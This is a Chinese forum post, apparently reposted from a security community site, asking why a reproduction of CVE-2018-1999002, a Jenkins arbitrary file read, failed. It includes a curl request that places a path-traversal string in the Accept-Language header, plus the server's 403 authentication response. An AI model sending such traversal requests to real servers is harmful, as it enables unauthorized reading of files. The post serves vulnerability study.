CVE-2018-1999002 jenkins任意文件读取有人复现成功么。。

2019-04-04 约 318 字 预计阅读 1 分钟

声明:本文 【CVE-2018-1999002 jenkins任意文件读取有人复现成功么。。】 由作者 fa11ing1eaf 于 2018-07-25 21:32:19 首发 先知社区 曾经 浏览数 1720 次

感谢 fa11ing1eaf 的辛苦付出!

用了官方的docker,在linux上测试。 以及在windows上测试。。都没复现。。
请问哪里有坑么。。

~ > curl 'http://192.168.1.51:8080/plugin/credentials/.ini' -H 'Accept-Language: ../../../../../../../../../../windows/win' -H 'Cookie: JSESSIONID.a3d85595=node01v1c3z2oeevt5mucfmjq8er3e1.node0; screenResolution=1920x1080; JSESSIONID.b2a47fc0=node02xwyedhvismk1ilmk23ziw4010.node0; JSESSIONID.4d57c7d3=node0kheawubrizfx1s6peq1c05uwu0.node0' -v
*   Trying 192.168.1.51...
* Connected to 192.168.1.51 (192.168.1.51) port 8080 (#0)
> GET /plugin/credentials/.ini HTTP/1.1
> Host: 192.168.1.51:8080
> User-Agent: curl/7.43.0
> Accept: */*
> Accept-Language: ../../../../../../../../../../windows/win
> Cookie: JSESSIONID.a3d85595=node01v1c3z2oeevt5mucfmjq8er3e1.node0; screenResolution=1920x1080; JSESSIONID.b2a47fc0=node02xwyedhvismk1ilmk23ziw4010.node0; JSESSIONID.4d57c7d3=node0kheawubrizfx1s6peq1c05uwu0.node0
>
< HTTP/1.1 403 Forbidden
< Date: Wed, 25 Jul 2018 13:30:59 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< X-Hudson: 1.395
< X-Jenkins: 2.132
< X-Jenkins-Session: 3a9c067d
< X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 853
< Server: Jetty(9.4.z-SNAPSHOT)
<
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fplugin%2Fcredentials%2F.ini'/><script>window.location.replace('/login?from=%2Fplugin%2Fcredentials%2F.ini');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:

Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

* Connection #0 to host 192.168.1.51 left intact
</body></html>

关键词:[‘新手’, ‘问与答’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now